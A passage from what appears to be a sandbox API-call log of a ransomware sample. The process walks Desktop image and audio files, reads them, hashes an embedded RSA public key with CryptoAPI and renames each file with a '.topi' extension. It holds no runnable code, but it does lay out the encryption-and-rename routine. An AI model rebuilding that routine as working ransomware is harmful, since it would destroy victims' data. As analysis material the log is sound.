[0094.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0094.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0094.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0094.802] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yx6 GdWti8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yx6 gdwti8.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yx6 GdWti8.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yx6 gdwti8.jpg.topi")) returned 1 [0094.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.802] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.804] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35037180, ftCreationTime.dwHighDateTime=0x1d5c05c, ftLastAccessTime.dwLowDateTime=0x1740b7e0, ftLastAccessTime.dwHighDateTime=0x1d5c2ee, ftLastWriteTime.dwLowDateTime=0x1740b7e0, ftLastWriteTime.dwHighDateTime=0x1d5c2ee, nFileSizeHigh=0x0, nFileSizeLow=0x1013e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zsuP1kmCK5.bmp", cAlternateFileName="ZSUP1K~1.BMP")) returned 1 [0094.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.804] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zsuP1kmCK5.bmp") returned=".bmp" [0094.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zsuP1kmCK5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zsup1kmck5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.804] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=65854) returned 1 [0094.804] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.808] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x10118, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.808] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.809] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.809] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x1013e, lpOverlapped=0x0) returned 1 [0094.810] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.810] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.810] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.810] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.811] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.811] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.811] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.811] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.811] GetLastError () returned 0x0 [0094.811] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.811] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.812] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.812] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.812] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10140) returned 0x9a06a00 [0094.812] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3f58 [0094.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91b0 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3fa0 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91c8 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91f8 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9210 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.813] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91f8 | out: hHeap=0x680000) returned 1 [0094.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9210 | out: hHeap=0x680000) returned 1 [0094.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9210 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d91f8 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9210 | out: hHeap=0x680000) returned 1 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91f8 | out: hHeap=0x680000) returned 1 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.814] GetCurrentThreadId () returned 0x8c4 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e22d0 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.814] GetCurrentThreadId () returned 0x8c4 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91f8 [0094.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9210 [0094.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91e0 [0094.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.817] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zsuP1kmCK5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zsup1kmck5.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zsuP1kmCK5.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zsup1kmck5.bmp.topi")) returned 1 [0094.818] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.818] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.818] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.819] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.819] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38828410, ftCreationTime.dwHighDateTime=0x1d5bec5, ftLastAccessTime.dwLowDateTime=0x56b1ff50, ftLastAccessTime.dwHighDateTime=0x1d5be4e, ftLastWriteTime.dwLowDateTime=0x56b1ff50, ftLastWriteTime.dwHighDateTime=0x1d5be4e, nFileSizeHigh=0x0, nFileSizeLow=0x10fda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyE WC9uJ8lrpGI.mp3", cAlternateFileName="ZYEWC9~1.MP3")) returned 1 [0094.819] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZyE WC9uJ8lrpGI.mp3") returned=".mp3" [0094.819] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZyE WC9uJ8lrpGI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zye wc9uj8lrpgi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.820] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=69594) returned 1 [0094.820] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.823] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x10fb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.824] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.825] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.826] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.826] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.827] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.827] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.827] GetLastError () returned 0x0 [0094.827] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.827] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.827] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.827] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.827] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10fe0) returned 0x9a06a00 [0094.828] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3fa0 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91c8 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3fe8 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91e0 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9210 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9228 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.828] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9210 | out: hHeap=0x680000) returned 1 [0094.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9228 | out: hHeap=0x680000) returned 1 [0094.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9228 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9210 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.829] RtlAllocateHeap 